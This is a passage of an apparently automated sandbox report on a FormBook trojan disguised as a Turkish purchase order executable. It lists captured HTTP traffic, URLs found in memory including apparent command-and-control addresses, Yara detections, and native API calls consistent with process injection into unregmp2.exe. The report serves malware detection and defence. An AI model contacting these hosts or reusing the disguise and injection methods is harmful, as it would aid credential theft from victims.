69 a5 70 cd 05 fc 48 ad 32 35 5c 11 99 82 47 bf 10 e1 2a ab 3a 0f ce 56 9b ac f1 be cb 39 77 31 bc 16 bd 5b 56 d4 f2 a1 63 ca 54 ba 97 e8 f8 5b c7 df fe db a3 3d a6 c7 f2 ad cb b6 05 8f 59 62 42 7f d4 08 fe d8 e1 26 f3 78 f0 bc 72 2e db 7e 0b ff 9d 01 00 94 74 60 4e bd 53 a6 ce a1 24 2b d1 b2 92 0e 17 e3 19 6b e9 1d fb a4 c3 80 e5 8d f2 1f f5 79 7f 76 56 92 3c 4e a5 44 75 53 5b ea 8d 64 15 69 b2 39 0c 8d f2 18 53 25 4b a9 45 75 13 2d b4 47 bb d3 34 b0 43 0e 8d 92 12 4d b4 b7 c2 d6 ca e4 b0 1a f3 3f 1e ac e8 52 01 a1 55 6d 98 f2 d8 ba 1c 2a 34 1e 6d 0c 91 ca 75 5a 1c 73 d8 69 4c ad bf ed 9d 57 bb 23 4b 14 de f5 6f 95 61 0d aa ba f1 39 ac 57 ab 7d 33 96 5a 26 df 54 2d e4 ca 61 7d b7 29 d1 7b 82 e7 df 44 63 27 a4 1c 67 b2 8a ef 61 fa 6c 6c f2 83 72 e2 10 17 2d 87 67 e7 ab 2e 0e 6e 47 e4 d1 a6 5a e9 74 bd 5a 4d a9 c9 29 af c8 e4 b0 53 07 94 17 89 4b ef a9 3d 95 d3 b8 f3 d3 98 52 b6 69 52 0f 75 12 10 96 de dc 23 eb 0e 29 33 0e 55 2b 6a cc c1 90 c1 a9 7c 60 3e 87 75 77 00 47 5a c9 3b 81 61 45 1a 21 69 98 87 3c b0 07 bd 75 c1 d4 91 7a 80 3f 65 b4 32 c8 4a 4d 53 de 1d 19 1f 76 0f 73 58 3f eb 0e 33 e3 90 08 7c b6 9a e6 11 42 4f b4 2e 9f cf 99 63 9e ba 30 df 29 c3 89 ba ef bb 03 3c 3d 99 3f c6 e0 68 97 58 91 15 91 95 5b 88 9e fa aa 61 a2 8a f6 56 18 Data Ascii: 494V6}~DAPIB+{EZ"G%)N/(R^mv _dv]<Vo-LhPbQ&+:>G7o6B6dFYY!e$C;<ipH25\G:V9w1[VcT[=YbB&xr.~t`NS$+kyvV<NDuS[di9S%KEu-G4CM?RUm*4muZsiLW#Koa9W}3Z&T-a}){Dc'gallr-g.nGZtZM)SK=RiRu#)3U+j\|`>uwGZ;aE!i<uz?
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 06:37:14 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-store, no-cache, must-revalidateVary: Accept-Encodinghost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Newfold-Cache-Level: 2X-Endurance-Cache-Level: 2X-nginx-cache: WordPressCF-Cache-Status: DYNAMICSet-Cookie: _cfuvid=7vZ0TPxp2dfdC1QikTRwrnCZPtzWQi9yVN2T0156zi4-1719988634359-0.0.1.1-604800000; path=/; domain=.www.stefanogaus.com; HttpOnlyServer: cloudflareCF-RAY: 89d4dda3598a19d7-EWRContent-Encoding: gzipData Raw: 34 39 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a4 56 db 8e db 36 10 7d f6 7e c5 44 41 f3 50 94 a6 bd 49 8a 42 2b 7b 91 b4 45 5a a0 97 00 db 22 e8 d3 82 12 c7 12 b3 14 47 25 29 cb 4e 91 7f 2f 28 52 5e 6d 76 13 20 89 5f 64 0d e7 76 e6 0c 8f 5d 3c fa e9 cf 1f ff fa e7 f5 cf d0 f8 56 6f cf 8a f0 00 2d 4c bd c9 d0 b0 bf af b2 ed d9 a2 68 50 c8 ed d9 62 51 b4 e8 05 18 d1 e2 26 db 2b 1c 3a b2 3e 83 8a 8c 47 e3 37 d9 a0 a4 6f 36 12 f7 aa 42 36 be 64 1f 46 59 2a c9 bb 59 8c 21 65 24 1e be 03 43 3b d2 9a 86 0c f8 18 e4 95 d7 b8 bd f2 b8 13 86 e0 95 e8 1d 3c 69 a5 70 cd 05 fc 48 ad 32 35 5c 11 99 82 47 bf 10 e1 2a ab 3a 0f ce 56 9b ac f1 be cb 39 77 31 bc 16 bd 5b 56 d4 f2 a1 63 ca 54 ba 97 e8 f8 5b c7 df fe db a3 3d a6 c7 f2 ad cb b6 05 8f 59 62 42 7f d4 08 fe d8 e1 26 f3 78 f0 bc 72 2e db 7e 0b ff 9d 01 00 94 74 60 4e bd 53 a6 ce a1 24 2b d1 b2 92 0e 17 e3 19 6b e9 1d fb a4 c3 80 e5 8d f2 1f f5 79 7f 76 56 92 3c 4e a5 44 75 53 5b ea 8d 64 15 69 b2 39 0c 8d f2 18 53 25 4b a9 45 75 13 2d b4 47 bb d3 34 b0 43 0e 8d 92 12 4d b4 b7 c2 d6 ca e4 b0 1a f3 3f 1e ac e8 52 01 a1 55 6d 98 f2 d8 ba 1c 2a 34 1e 6d 0c 91 ca 75 5a 1c 73 d8 69 4c ad bf ed 9d 57 bb 23 4b 14 de f5 6f 95 61 0d aa ba f1 39 ac 57 ab 7d 33 96 5a 26 df 54 2d e4 ca 61 7d b7 29 d1 7b 82 e7 df 44 63 27 a4 1c 67 b2 8a ef 61 fa 6c 6c f2 83 72 e2 10 17 2d 87 67 e7 ab 2e 0e 6e 47 e4 d1 a6 5a e9 74 bd 5a 4d a9 c9 29 af c8 e4 b0 53 07 94 17 89 4b ef a9 3d 95 d3 b8 f3 d3 98 52 b6 69 52 0f 75 12 10 96 de dc 23 eb 0e 29 33 0e 55 2b 6a cc c1 90 c1 a9 7c 60 3e 87 75 77 00 47 5a c9 3b 81 61 45 1a 21 69 98 87 3c b0 07 bd 75 c1 d4 91 7a 80 3f 65 b4 32 c8 4a 4d 53 de 1d 19 1f 76 0f 73 58 3f eb 0e 33 e3 90 08 7c b6 9a e6 11 42 4f b4 2e 9f cf 99 63 9e ba 30 df 29 c3 89 ba ef bb 03 3c 3d 99 3f c6 e0 68 97 58 91 15 91 95 5b 88 9e fa aa 61 a2 8a f6 56 18 Data Ascii: 49fV6}~DAPIB+{EZ"G%)N/(R^mv _dv]<Vo-LhPbQ&+:>G7o6B6dFYY!e$C;<ipH25\G:V9w1[VcT[=YbB&xr.~t`NS$+kyvV<NDuS[di9S%KEu-G4CM?RUm*4muZsiLW#Koa9W}3Z&T-a}){Dc'gallr-g.nGZtZM)SK=RiRu#)3U+j\|`>uwGZ;aE!i<uz?

Source: unregmp2.exe, 00000007.00000002.3849243854.0000000005BA4000.00000004.10000000.00040000.00000000.sdmp, UQgCFxrqyzfeJVhlwgINlmFOLs.exe, 0000000B.00000002.3848714336.0000000003C64000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://mocar.pro/prg5/?eZ=3HYLM&iJiX_=OUWlBSduFOmbWHHx1
Source: Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe, 00000000.00000002.1404111165.00000000029B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: UQgCFxrqyzfeJVhlwgINlmFOLs.exe, 0000000B.00000002.3851020084.0000000005082000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.stefanogaus.com
Source: UQgCFxrqyzfeJVhlwgINlmFOLs.exe, 0000000B.00000002.3851020084.0000000005082000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.stefanogaus.com/0rsk/
Source: unregmp2.exe, 00000007.00000002.3849243854.0000000006510000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000007.00000002.3851299709.0000000007460000.00000004.00000800.00020000.00000000.sdmp, UQgCFxrqyzfeJVhlwgINlmFOLs.exe, 0000000B.00000002.3848714336.00000000045D0000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.thesprinklesontop.com/px.js?ch=1
Source: unregmp2.exe, 00000007.00000002.3849243854.0000000006510000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000007.00000002.3851299709.0000000007460000.00000004.00000800.00020000.00000000.sdmp, UQgCFxrqyzfeJVhlwgINlmFOLs.exe, 0000000B.00000002.3848714336.00000000045D0000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.thesprinklesontop.com/px.js?ch=2
Source: unregmp2.exe, 00000007.00000002.3849243854.0000000006510000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000007.00000002.3851299709.0000000007460000.00000004.00000800.00020000.00000000.sdmp, UQgCFxrqyzfeJVhlwgINlmFOLs.exe, 0000000B.00000002.3848714336.00000000045D0000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.thesprinklesontop.com/sk-logabpstatus.php?a=a1hVY3BFSVExenNSTmVHYmpRNUdGNXVZNnlIbGdzZTQ2N
Source: unregmp2.exe, 00000007.00000003.1791013384.00000000077B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: unregmp2.exe, 00000007.00000003.1791013384.00000000077B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: unregmp2.exe, 00000007.00000003.1791013384.00000000077B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: unregmp2.exe, 00000007.00000003.1791013384.00000000077B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: unregmp2.exe, 00000007.00000002.3849243854.0000000005EC8000.00000004.10000000.00040000.00000000.sdmp, UQgCFxrqyzfeJVhlwgINlmFOLs.exe, 0000000B.00000002.3848714336.0000000003F88000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark
Source: unregmp2.exe, 00000007.00000003.1791013384.00000000077B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: unregmp2.exe, 00000007.00000003.1791013384.00000000077B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: unregmp2.exe, 00000007.00000003.1791013384.00000000077B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: unregmp2.exe, 00000007.00000002.3849243854.0000000005EC8000.00000004.10000000.00040000.00000000.sdmp, UQgCFxrqyzfeJVhlwgINlmFOLs.exe, 0000000B.00000002.3848714336.0000000003F88000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js
Source: unregmp2.exe, 00000007.00000002.3849243854.0000000005EC8000.00000004.10000000.00040000.00000000.sdmp, UQgCFxrqyzfeJVhlwgINlmFOLs.exe, 0000000B.00000002.3848714336.0000000003F88000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js
Source: unregmp2.exe, 00000007.00000002.3849243854.0000000005EC8000.00000004.10000000.00040000.00000000.sdmp, UQgCFxrqyzfeJVhlwgINlmFOLs.exe, 0000000B.00000002.3848714336.0000000003F88000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js
Source: unregmp2.exe, 00000007.00000002.3849243854.0000000005EC8000.00000004.10000000.00040000.00000000.sdmp, UQgCFxrqyzfeJVhlwgINlmFOLs.exe, 0000000B.00000002.3848714336.0000000003F88000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://hm.baidu.com/hm.js?
Source: unregmp2.exe, 00000007.00000002.3849243854.0000000005EC8000.00000004.10000000.00040000.00000000.sdmp, UQgCFxrqyzfeJVhlwgINlmFOLs.exe, 0000000B.00000002.3848714336.0000000003F88000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js
Source: unregmp2.exe, 00000007.00000002.3849243854.0000000005EC8000.00000004.10000000.00040000.00000000.sdmp, UQgCFxrqyzfeJVhlwgINlmFOLs.exe, 0000000B.00000002.3848714336.0000000003F88000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css
Source: unregmp2.exe, 00000007.00000002.3849243854.000000000605A000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000007.00000002.3851299709.0000000007460000.00000004.00000800.00020000.00000000.sdmp, UQgCFxrqyzfeJVhlwgINlmFOLs.exe, 0000000B.00000002.3848714336.000000000411A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://img.sedoparking.com/templates/images/hero_nc.svg
Source: unregmp2.exe, 00000007.00000002.3846142193.000000000067B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: unregmp2.exe, 00000007.00000002.3846142193.0000000000699000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: unregmp2.exe, 00000007.00000003.1786633656.00000000076E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: unregmp2.exe, 00000007.00000002.3846142193.000000000067B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: unregmp2.exe, 00000007.00000002.3846142193.000000000067B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: unregmp2.exe, 00000007.00000002.3846142193.000000000067B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: unregmp2.exe, 00000007.00000002.3846142193.0000000000699000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: unregmp2.exe, 00000007.00000002.3849243854.0000000005EC8000.00000004.10000000.00040000.00000000.sdmp, UQgCFxrqyzfeJVhlwgINlmFOLs.exe, 0000000B.00000002.3848714336.0000000003F88000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://track.uc.cn/collect
Source: unregmp2.exe, 00000007.00000003.1791013384.00000000077B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: unregmp2.exe, 00000007.00000002.3849243854.000000000555C000.00000004.10000000.00040000.00000000.sdmp, UQgCFxrqyzfeJVhlwgINlmFOLs.exe, 0000000B.00000002.3848714336.000000000361C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.ennerdaledevcons.co.uk/4ksh/?eZ=3HYLM&iJiX_=URmoC5X4e6K7wlVx2KbqE9eRaPOmGfPMOnoqB8M3F0zE
Source: unregmp2.exe, 00000007.00000003.1791013384.00000000077B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unregmp2.exe, 00000007.00000002.3849243854.000000000605A000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000007.00000002.3851299709.0000000007460000.00000004.00000800.00020000.00000000.sdmp, UQgCFxrqyzfeJVhlwgINlmFOLs.exe, 0000000B.00000002.3848714336.000000000411A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.namecheap.com/domains/registration/results/?domain=fungusbus.com
Source: UQgCFxrqyzfeJVhlwgINlmFOLs.exe, 0000000B.00000002.3848714336.000000000411A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.sedo.com/services/parking.php3

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 5.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.3851020084.0000000005020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1608845942.00000000016E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3845669243.0000000000410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1607201928.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3848068617.0000000000D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3847970736.0000000000D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1608954398.0000000001720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3848399247.0000000002FD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 5.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 5.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.3851020084.0000000005020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.1608845942.00000000016E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.3845669243.0000000000410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.1607201928.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.3848068617.0000000000D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.3847970736.0000000000D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.1608954398.0000000001720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.3848399247.0000000002FD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

.NET source code contains very large array initializations

Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.5330000.5.raw.unpack, -Module-.cs	Large array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088
Source: 0.2.Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe.28fbcc4.0.raw.unpack, -Module-.cs	Large array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe

Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_0042B463 NtClose,	5_2_0042B463
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01402B60 NtClose,LdrInitializeThunk,	5_2_01402B60
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01402DF0 NtQuerySystemInformation,LdrInitializeThunk,	5_2_01402DF0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01402C70 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_01402C70
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_014035C0 NtCreateMutant,LdrInitializeThunk,	5_2_014035C0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01404340 NtSetContextThread,	5_2_01404340
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01404650 NtSuspendThread,	5_2_01404650
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01402BE0 NtQueryValueKey,	5_2_01402BE0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01402BF0 NtAllocateVirtualMemory,	5_2_01402BF0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01402B80 NtQueryInformationFile,	5_2_01402B80
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01402BA0 NtEnumerateValueKey,	5_2_01402BA0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01402AD0 NtReadFile,	5_2_01402AD0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01402AF0 NtWriteFile,	5_2_01402AF0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01402AB0 NtWaitForSingleObject,	5_2_01402AB0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01402D00 NtSetInformationFile,	5_2_01402D00
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01402D10 NtMapViewOfSection,	5_2_01402D10
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01402D30 NtUnmapViewOfSection,	5_2_01402D30
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01402DD0 NtDelayExecution,	5_2_01402DD0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01402DB0 NtEnumerateKey,	5_2_01402DB0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01402C60 NtCreateKey,	5_2_01402C60
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01402C00 NtQueryInformationProcess,	5_2_01402C00
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01402CC0 NtQueryVirtualMemory,	5_2_01402CC0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01402CF0 NtOpenProcess,	5_2_01402CF0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01402CA0 NtQueryInformationToken,	5_2_01402CA0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01402F60 NtCreateProcessEx,	5_2_01402F60
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01402F30 NtCreateSection,	5_2_01402F30
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01402FE0 NtCreateFile,	5_2_01402FE0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01402F90 NtProtectVirtualMemory,	5_2_01402F90
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01402FA0 NtQuerySection,	5_2_01402FA0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01402FB0 NtResumeThread,	5_2_01402FB0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01402E30 NtWriteVirtualMemory,	5_2_01402E30
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01402EE0 NtQueueApcThread,	5_2_01402EE0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01402E80 NtReadVirtualMemory,	5_2_01402E80
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01402EA0 NtAdjustPrivilegesToken,	5_2_01402EA0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01403010 NtOpenDirectoryObject,	5_2_01403010
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01403090 NtSetValueKey,	5_2_01403090
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_014039B0 NtGetContextThread,	5_2_014039B0
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01403D70 NtOpenThread,	5_2_01403D70
Source: C:\Users\user\Desktop\Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe	Code function: 5_2_01403D10 NtOpenProcessToken,	5_2_01403D10
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04574650 NtSuspendThread,LdrInitializeThunk,	7_2_04574650
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04574340 NtSetContextThread,LdrInitializeThunk,	7_2_04574340
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04572C70 NtFreeVirtualMemory,LdrInitializeThunk,	7_2_04572C70
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04572C60 NtCreateKey,LdrInitializeThunk,	7_2_04572C60
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04572CA0 NtQueryInformationToken,LdrInitializeThunk,	7_2_04572CA0
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04572D10 NtMapViewOfSection,LdrInitializeThunk,	7_2_04572D10
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04572D30 NtUnmapViewOfSection,LdrInitializeThunk,	7_2_04572D30
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04572DD0 NtDelayExecution,LdrInitializeThunk,	7_2_04572DD0
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04572DF0 NtQuerySystemInformation,LdrInitializeThunk,	7_2_04572DF0
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04572EE0 NtQueueApcThread,LdrInitializeThunk,	7_2_04572EE0
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04572E80 NtReadVirtualMemory,LdrInitializeThunk,	7_2_04572E80
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04572F30 NtCreateSection,LdrInitializeThunk,	7_2_04572F30
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04572FE0 NtCreateFile,LdrInitializeThunk,	7_2_04572FE0
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04572FB0 NtResumeThread,LdrInitializeThunk,	7_2_04572FB0
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04572AD0 NtReadFile,LdrInitializeThunk,	7_2_04572AD0
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04572AF0 NtWriteFile,LdrInitializeThunk,	7_2_04572AF0
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04572B60 NtClose,LdrInitializeThunk,	7_2_04572B60
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04572BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	7_2_04572BF0
Source: C:\Windows\SysWOW64\unregmp2.exe	Code function: 7_2_04572BE0 NtQueryValueKey,LdrInitializeThunk,	7_2_04572BE0
